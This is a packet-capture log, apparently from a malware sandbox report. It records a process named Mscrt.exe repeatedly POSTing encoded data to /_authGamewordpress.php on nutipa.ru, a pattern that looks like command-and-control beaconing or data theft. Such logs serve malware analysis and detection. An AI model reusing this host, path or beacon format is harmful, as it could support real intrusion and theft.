Dec 15, 2024 04:18:21.154557943 CET	2536	OUT	Data Raw: 55 54 46 58 5f 5b 5d 56 5d 5a 56 51 50 5a 57 5a 55 5c 5e 48 5a 53 5b 5f 59 59 5d 5a 54 5c 59 52 58 58 57 5f 5e 53 57 51 42 56 52 59 5d 54 5e 53 55 5d 58 5c 58 5f 5a 5d 57 58 56 5b 58 50 55 59 5d 58 5a 5a 56 59 50 5c 5a 59 5d 53 5b 5b 5e 5a 55 5f Data Ascii: UTFX_[]V]ZVQPZWZU\^HZS[_YY]ZT\YRXXW_^SWQBVRY]T^SU]X\X_Z]WXV[XPUY]XZZVYP\ZY]S[[^ZU_ZXP_U_S^PR]STS_Z_]P_]]XTFW\[A_]\XQCSSUZS]__XBT\R_W]]T\]^QUTDZ_Z_W^VX[[]]CS][RX][YD^]VUXQV^Q]WT[^^P[P]^$(!?:7"/>C<-7Y#1=-&X=>0?Y$X)<#1S-+.F'#P /
Dec 15, 2024 04:18:21.880856037 CET	25	IN	HTTP/1.1 100 Continue
Dec 15, 2024 04:18:22.127737045 CET	792	IN	HTTP/1.1 200 OK Date: Sun, 15 Dec 2024 03:18:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Fjsblm5SdKKeCLPtnEyJC1modVIYTrpR4CKl34cBI8SAqECCoKdz4C3fWM4r6IvVE0uPjhkt0Eb%2FDg7yeOpnkkLEZtXcEkA9hUkj2WJyR5E2fnz%2F0nycm8JtJyA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f234931cb830f45-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3445&min_rtt=1707&rtt_var=4117&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2856&delivery_rate=93505&cwnd=156&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 44W@T0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.4	49851	172.67.185.214	80	3084	C:\ComponentReviewperfmonitor\Mscrt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 04:18:22.406483889 CET	320	OUT	POST /_authGamewordpress.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: nutipa.ru Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Dec 15, 2024 04:18:22.763765097 CET	2536	OUT	Data Raw: 50 54 46 5a 5f 57 58 50 5d 5a 56 51 50 51 57 54 55 57 5e 44 5a 56 5b 5a 59 59 5d 5a 54 5c 59 52 58 58 57 5f 5e 53 57 51 42 56 52 59 5d 54 5e 53 55 5d 58 5c 58 5f 5a 5d 57 58 56 5b 58 50 55 59 5d 58 5a 5a 56 59 50 5c 5a 59 5d 53 5b 5b 5e 5a 55 5f Data Ascii: PTFZ_WXP]ZVQPQWTUW^DZV[ZYY]ZT\YRXXW_^SWQBVRY]T^SU]X\X_Z]WXV[XPUY]XZZVYP\ZY]S[[^ZU_ZXP_U_S^PR]STS_Z_]P_]]XTFW\[A_]\XQCSSUZS]__XBT\R_W]]T\]^QUTDZ_Z_W^VX[[]]CS][RX][YD^]VUXQV^Q]WT[^^P[P]^$[<-Z)\?[!<>@+., /Z&_%>=W>3/^'6_? );.F'#P
Dec 15, 2024 04:18:23.492469072 CET	25	IN	HTTP/1.1 100 Continue
Dec 15, 2024 04:18:23.740246058 CET	794	IN	HTTP/1.1 200 OK Date: Sun, 15 Dec 2024 03:18:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AGWRuXDV9MwRfx9An%2BhV6Ho7G%2BAasN1W07hZQeXOl3GfBzFtT2dE2h%2BPFK17ph2zendY3ljNAlPvzoDj9AHHOuzm%2BnBtH11qwy6Fn%2FDPOpDhFjXhtBUy5mViMZY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f23493bdfcc3320-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3264&min_rtt=1830&rtt_var=3556&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2856&delivery_rate=109700&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 40 54 0d 0a Data Ascii: 44W@T
Dec 15, 2024 04:18:23.931996107 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.4	49852	172.67.185.214	80	3084	C:\ComponentReviewperfmonitor\Mscrt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 04:18:23.886410952 CET	320	OUT	POST /_authGamewordpress.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: nutipa.ru Content-Length: 1424 Expect: 100-continue Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.4	49857	172.67.185.214	80	3084	C:\ComponentReviewperfmonitor\Mscrt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 04:18:24.177791119 CET	320	OUT	POST /_authGamewordpress.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: nutipa.ru Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Dec 15, 2024 04:18:24.529292107 CET	2536	OUT	Data Raw: 55 53 43 5f 5f 5e 5d 51 5d 5a 56 51 50 5f 57 50 55 52 5e 41 5a 57 5b 58 59 59 5d 5a 54 5c 59 52 58 58 57 5f 5e 53 57 51 42 56 52 59 5d 54 5e 53 55 5d 58 5c 58 5f 5a 5d 57 58 56 5b 58 50 55 59 5d 58 5a 5a 56 59 50 5c 5a 59 5d 53 5b 5b 5e 5a 55 5f Data Ascii: USC__^]Q]ZVQP_WPUR^AZW[XYY]ZT\YRXXW_^SWQBVRY]T^SU]X\X_Z]WXV[XPUY]XZZVYP\ZY]S[[^ZU_ZXP_U_S^PR]STS_Z_]P_]]XTFW\[A_]\XQCSSUZS]__XBT\R_W]]T\]^QUTDZ_Z_W^VX[[]]CS][RX][YD^]VUXQV^Q]WT[^^P[P]^'+="]6E(4 ?4[&2>)><3= &;.F'#P
Dec 15, 2024 04:18:25.265430927 CET	25	IN	HTTP/1.1 100 Continue
Dec 15, 2024 04:18:25.516474009 CET	794	IN	HTTP/1.1 200 OK Date: Sun, 15 Dec 2024 03:18:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xykjHjSxDagPbpATlVzTMPu8qteRKU%2FqH1CRycAyxqU97kvZV4Q46DMEdCzJNIhWNupTJCrNL6gCAhSO8xvNVF5rKdYWsnSP%2BxNqGHLFp70ac23%2BXC3Dcm6caAw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f234946f84b0cb0-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=5445&min_rtt=3012&rtt_var=5996&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2856&delivery_rate=64952&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 44W@T0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.4	49859	172.67.185.214	80	3084	C:\ComponentReviewperfmonitor\Mscrt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 04:18:25.757853031 CET	320	OUT	POST /_authGamewordpress.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: nutipa.ru Content-Length: 2532 Expect: 100-continue Connection: Keep-Alive
Dec 15, 2024 04:18:26.123115063 CET	2532	OUT	Data Raw: 50 55 43 51 5f 59 58 50 5d 5a 56 51 50 58 57 51 55 56 5e 43 5a 50 5b 53 59 59 5d 5a 54 5c 59 52 58 58 57 5f 5e 53 57 51 42 56 52 59 5d 54 5e 53 55 5d 58 5c 58 5f 5a 5d 57 58 56 5b 58 50 55 59 5d 58 5a 5a 56 59 50 5c 5a 59 5d 53 5b 5b 5e 5a 55 5f Data Ascii: PUCQ_YXP]ZVQPXWQUV^CZP[SYY]ZT\YRXXW_^SWQBVRY]T^SU]X\X_Z]WXV[XPUY]XZZVYP\ZY]S[[^ZU_ZXP_U_S^PR]STS_Z_]P_]]XTFW\[A_]\XQCSSUZS]__XBT\R_W]]T\]^QUTDZ_Z_W^VX[[]]CS][RX][YD^]VUXQV^Q]WT[^^P[P]^'+-X=:7Y"<*+-#;%>"]'>>,'>.X=328+.F'#P /
Dec 15, 2024 04:18:26.843604088 CET	25	IN	HTTP/1.1 100 Continue
Dec 15, 2024 04:18:27.091243982 CET	800	IN	HTTP/1.1 200 OK Date: Sun, 15 Dec 2024 03:18:26 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uNUkoDfr%2F2THShxV5admgx6LNY%2BE5MQHCCFIAe113vjls%2BicAw08NqgyFtDaMuD6Uv4rdKSDLrtsKIdplidMbTATr7N%2BzFOwsgp%2BT0n%2BRwE5FqTkphOzOaKFrkk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f234950cb084349-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4292&min_rtt=1643&rtt_var=5916&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2852&delivery_rate=63917&cwnd=226&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 44W@T0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.4	49864	172.67.185.214	80	3084	C:\ComponentReviewperfmonitor\Mscrt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 04:18:27.339802027 CET	320	OUT	POST /_authGamewordpress.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: nutipa.ru Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Dec 15, 2024 04:18:27.685726881 CET	2536	OUT	Data Raw: 50 54 43 5b 5f 5c 5d 51 5d 5a 56 51 50 5a 57 54 55 5c 5e 48 5a 5e 5b 5d 59 59 5d 5a 54 5c 59 52 58 58 57 5f 5e 53 57 51 42 56 52 59 5d 54 5e 53 55 5d 58 5c 58 5f 5a 5d 57 58 56 5b 58 50 55 59 5d 58 5a 5a 56 59 50 5c 5a 59 5d 53 5b 5b 5e 5a 55 5f Data Ascii: PTC[_\]Q]ZVQPZWTU\^HZ^[]YY]ZT\YRXXW_^SWQBVRY]T^SU]X\X_Z]WXV[XPUY]XZZVYP\ZY]S[[^ZU_ZXP_U_S^PR]STS_Z_]P_]]XTFW\[A_]\XQCSSUZS]__XBT\R_W]]T\]^QUTDZ_Z_W^VX[[]]CS][RX][YD^]VUXQV^Q]WT[^^P[P]^'+=!>\'\6,>D)>3Y78\&22.-V)383%(39W/+.F'#P /
Dec 15, 2024 04:18:28.424283981 CET	25	IN	HTTP/1.1 100 Continue
Dec 15, 2024 04:18:28.665174961 CET	790	IN	HTTP/1.1 200 OK Date: Sun, 15 Dec 2024 03:18:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qUOsPPJfdrEQfjqxEHFXik3Cx7q8qehNetLw87jL6Mx1gEC1l7CXIld71wTpOxxVU9H83UwsFc51P4HcPLaBWM44ZQhU4gjkYCOXSY0BJY4ie7bba9D5m%2B6LiXw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f23495abd075e76-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3878&min_rtt=1572&rtt_var=5202&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2856&delivery_rate=72916&cwnd=211&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 44W@T0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.4	49869	172.67.185.214	80	3084	C:\ComponentReviewperfmonitor\Mscrt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 04:18:28.917387009 CET	320	OUT	POST /_authGamewordpress.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: nutipa.ru Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.4	49870	172.67.185.214	80	3084	C:\ComponentReviewperfmonitor\Mscrt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 04:18:29.057534933 CET	320	OUT	POST /_authGamewordpress.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: nutipa.ru Content-Length: 1424 Expect: 100-continue Connection: Keep-Alive
Dec 15, 2024 04:18:29.404510975 CET	1424	OUT	Data Raw: 55 50 43 59 5f 5d 58 54 5d 5a 56 51 50 5d 57 55 55 52 5e 41 5a 54 5b 5e 59 59 5d 5a 54 5c 59 52 58 58 57 5f 5e 53 57 51 42 56 52 59 5d 54 5e 53 55 5d 58 5c 58 5f 5a 5d 57 58 56 5b 58 50 55 59 5d 58 5a 5a 56 59 50 5c 5a 59 5d 53 5b 5b 5e 5a 55 5f Data Ascii: UPCY_]XT]ZVQP]WUUR^AZT[^YY]ZT\YRXXW_^SWQBVRY]T^SU]X\X_Z]WXV[XPUY]XZZVYP\ZY]S[[^ZU_ZXP_U_S^PR]STS_Z_]P_]]XTFW\[A_]\XQCSSUZS]__XBT\R_W]]T\]^QUTDZ_Z_W^VX[[]]CS][RX][YD^]VUXQV^Q]WT[^^P[P]^$?>4#<%?(7Y8]1X.&U(0/Z'>(3,.F'#P 3
Dec 15, 2024 04:18:30.143376112 CET	25	IN	HTTP/1.1 100 Continue
Dec 15, 2024 04:18:30.388716936 CET	953	IN	HTTP/1.1 200 OK Date: Sun, 15 Dec 2024 03:18:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=om%2F1O6iVL95gQTG%2Fz1EX8FV1f6mA4m6vEs10JUMQb51%2FZ9OBayHnGP%2BW%2FwM3NbIl0U6Acw%2BvCn3UwTSnhn2RXUP24PUWpTtWa3jurIyhZHcl%2BD6v1DFoLA%2F7byY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f234965696943a9-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3852&min_rtt=1615&rtt_var=5081&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1744&delivery_rate=74802&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 38 0d 0a 06 1f 39 13 22 03 22 53 23 10 02 55 39 3c 21 1a 2b 56 23 1d 27 54 21 58 33 01 23 1b 2a 2d 20 0f 31 2a 31 5e 37 0c 31 57 3e 37 26 05 25 1c 21 51 03 11 22 59 25 10 38 10 2b 3a 30 19 32 0f 01 14 31 04 23 04 28 16 0b 0d 27 28 37 53 22 3d 20 1a 2e 29 38 5d 28 14 02 03 2e 3e 04 50 23 36 2e 53 0c 17 25 10 3c 07 2e 5f 21 22 3d 56 30 02 3b 55 23 00 26 1e 3d 23 28 1d 24 0d 28 0b 24 2e 2b 09 36 09 36 08 32 03 2e 5a 21 21 2d 08 29 32 25 5c 20 05 2e 52 03 34 5d 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 989""S#U9<!+V#'T!X3#- 11^71W>7&%!Q"Y%8+:021#('(7S"= .)8](.>P#6.S%<._!"=V0;U#&=#($($.+662.Z!!-)2%\ .R4]T0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.4	49871	172.67.185.214	80	3084	C:\ComponentReviewperfmonitor\Mscrt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 04:18:29.183662891 CET	320	OUT	POST /_authGamewordpress.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: nutipa.ru Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Dec 15, 2024 04:18:29.529284954 CET	2536	OUT	Data Raw: 50 56 46 5a 5f 58 58 52 5d 5a 56 51 50 50 57 54 55 55 5e 44 5a 56 5b 5e 59 59 5d 5a 54 5c 59 52 58 58 57 5f 5e 53 57 51 42 56 52 59 5d 54 5e 53 55 5d 58 5c 58 5f 5a 5d 57 58 56 5b 58 50 55 59 5d 58 5a 5a 56 59 50 5c 5a 59 5d 53 5b 5b 5e 5a 55 5f Data Ascii: PVFZ_XXR]ZVQPPWTUU^DZV[^YY]ZT\YRXXW_^SWQBVRY]T^SU]X\X_Z]WXV[XPUY]XZZVYP\ZY]S[[^ZU_ZXP_U_S^PR]STS_Z_]P_]]XTFW\[A_]\XQCSSUZS]__XBT\R_W]]T\]^QUTDZ_Z_W^VX[[]]CS][RX][YD^]VUXQV^Q]WT[^^P[P]^$(-9='[!,A+-X7Y(X22]&.%P(0?[$=+U!V/.F'#P
Dec 15, 2024 04:18:30.270271063 CET	25	IN	HTTP/1.1 100 Continue
Dec 15, 2024 04:18:30.516575098 CET	787	IN	HTTP/1.1 200 OK Date: Sun, 15 Dec 2024 03:18:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7lRzMqQaKnDR0KYcPN1Cl8UqVGpWsQebpkubaSOj4w4Le5qRYnGk7fzFgfBUoG%2BmA7wFMZyfnouPPw1wUCf31GasNS%2FeJG7KSCqvlg1uqMnScrij46lIMefZOhs%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f234966393443f2-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4154&min_rtt=2093&rtt_var=4907&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2856&delivery_rate=78574&cwnd=206&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 40 54 0d 0a Data Ascii: 44W@T
Dec 15, 2024 04:18:30.708750963 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.4	49877	172.67.185.214	80	3084	C:\ComponentReviewperfmonitor\Mscrt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 04:18:30.946252108 CET	296	OUT	POST /_authGamewordpress.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: nutipa.ru Content-Length: 2536 Expect: 100-continue
Dec 15, 2024 04:18:31.294955015 CET	2536	OUT	Data Raw: 50 5f 43 58 5f 5e 5d 51 5d 5a 56 51 50 5b 57 57 55 5d 5e 47 5a 5e 5b 52 59 59 5d 5a 54 5c 59 52 58 58 57 5f 5e 53 57 51 42 56 52 59 5d 54 5e 53 55 5d 58 5c 58 5f 5a 5d 57 58 56 5b 58 50 55 59 5d 58 5a 5a 56 59 50 5c 5a 59 5d 53 5b 5b 5e 5a 55 5f Data Ascii: P_CX_^]Q]ZVQP[WWU]^GZ^[RYY]ZT\YRXXW_^SWQBVRY]T^SU]X\X_Z]WXV[XPUY]XZZVYP\ZY]S[[^ZU_ZXP_U_S^PR]STS_Z_]P_]]XTFW\[A_]\XQCSSUZS]__XBT\R_W]]T\]^QUTDZ_Z_W^VX[[]]CS][RX][YD^]VUXQV^Q]WT[^^P[P]^'?2^?(6?>?=3\ /4Z&%'.;%._<06/+.F'#P +
Dec 15, 2024 04:18:32.031774998 CET	25	IN	HTTP/1.1 100 Continue
Dec 15, 2024 04:18:32.476532936 CET	804	IN	HTTP/1.1 200 OK Date: Sun, 15 Dec 2024 03:18:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3xSbx1cztic%2BOy%2B7uu4l0Pz%2BpDRGHMC48VDo3u5Z3TXvofcPrR%2BJlziFF%2FGQIG%2BBrmNZn8g2EdaSp7viHzDBXl0sSu6pdWmO%2FqqHqCzT4jPB78nxP8Sm9brL3%2Fc%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f2349713ce0188d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4211&min_rtt=1659&rtt_var=5727&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2832&delivery_rate=66120&cwnd=173&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 44W@T0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.4	49879	172.67.185.214	80	3084	C:\ComponentReviewperfmonitor\Mscrt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 04:18:32.734368086 CET	296	OUT	POST /_authGamewordpress.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: nutipa.ru Content-Length: 2536 Expect: 100-continue
Dec 15, 2024 04:18:33.091995001 CET	2536	OUT	Data Raw: 50 52 46 5c 5f 58 58 5e 5d 5a 56 51 50 5d 57 50 55 54 5e 45 5a 52 5b 58 59 59 5d 5a 54 5c 59 52 58 58 57 5f 5e 53 57 51 42 56 52 59 5d 54 5e 53 55 5d 58 5c 58 5f 5a 5d 57 58 56 5b 58 50 55 59 5d 58 5a 5a 56 59 50 5c 5a 59 5d 53 5b 5b 5e 5a 55 5f Data Ascii: PRF\_XX^]ZVQP]WPUT^EZR[XYY]ZT\YRXXW_^SWQBVRY]T^SU]X\X_Z]WXV[XPUY]XZZVYP\ZY]S[[^ZU_ZXP_U_S^PR]STS_Z_]P_]]XTFW\[A_]\XQCSSUZS]__XBT\R_W]]T\]^QUTDZ_Z_W^VX[[]]CS][RX][YD^]VUXQV^Q]WT[^^P[P]^'(-)65<.7#'2=2_&X:=#[%.!(05S/;.F'#P 3
Dec 15, 2024 04:18:33.822545052 CET	25	IN	HTTP/1.1 100 Continue
Dec 15, 2024 04:18:34.054956913 CET	797	IN	HTTP/1.1 200 OK Date: Sun, 15 Dec 2024 03:18:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=c%2FD9qGZu0ocVQGzOKCIiztyl1%2BJZIeqV8Oi%2FDgmYvKSKCr2go34lNGlf%2FGrJDdUDbwfzGul6kwDuQh96sudoUCvjx1OdDFxXeQsB0Q0xNT4bhkKt02ZDAXl5hdk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f23497c6ad343d7-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3204&min_rtt=1826&rtt_var=3441&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2832&delivery_rate=113592&cwnd=207&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 44W@T0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.4	49884	172.67.185.214	80	3084	C:\ComponentReviewperfmonitor\Mscrt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 04:18:34.312407970 CET	320	OUT	POST /_authGamewordpress.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: nutipa.ru Content-Length: 2536 Expect: 100-continue Connection: Keep-Alive
Dec 15, 2024 04:18:34.671241999 CET	2536	OUT	Data Raw: 50 57 43 5e 5a 5d 58 54 5d 5a 56 51 50 5c 57 56 55 5c 5e 41 5a 51 5b 5b 59 59 5d 5a 54 5c 59 52 58 58 57 5f 5e 53 57 51 42 56 52 59 5d 54 5e 53 55 5d 58 5c 58 5f 5a 5d 57 58 56 5b 58 50 55 59 5d 58 5a 5a 56 59 50 5c 5a 59 5d 53 5b 5b 5e 5a 55 5f Data Ascii: PWC^Z]XT]ZVQP\WVU\^AZQ[[YY]ZT\YRXXW_^SWQBVRY]T^SU]X\X_Z]WXV[XPUY]XZZVYP\ZY]S[[^ZU_ZXP_U_S^PR]STS_Z_]P_]]XTFW\[A_]\XQCSSUZS]__XBT\R_W]]T\]^QUTDZ_Z_W^VX[[]]CS][RX][YD^]VUXQV^Q]WT[^^P[P]^$\+-!)6<"<>,4?$[1&X1=-Q)$$"?#8;.F'#P 7
Dec 15, 2024 04:18:35.398432970 CET	25	IN	HTTP/1.1 100 Continue

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.4	49890	172.67.185.214	80	3084	C:\ComponentReviewperfmonitor\Mscrt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 04:18:35.527218103 CET	320	OUT	POST /_authGamewordpress.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: nutipa.ru Content-Length: 1424 Expect: 100-continue Connection: Keep-Alive
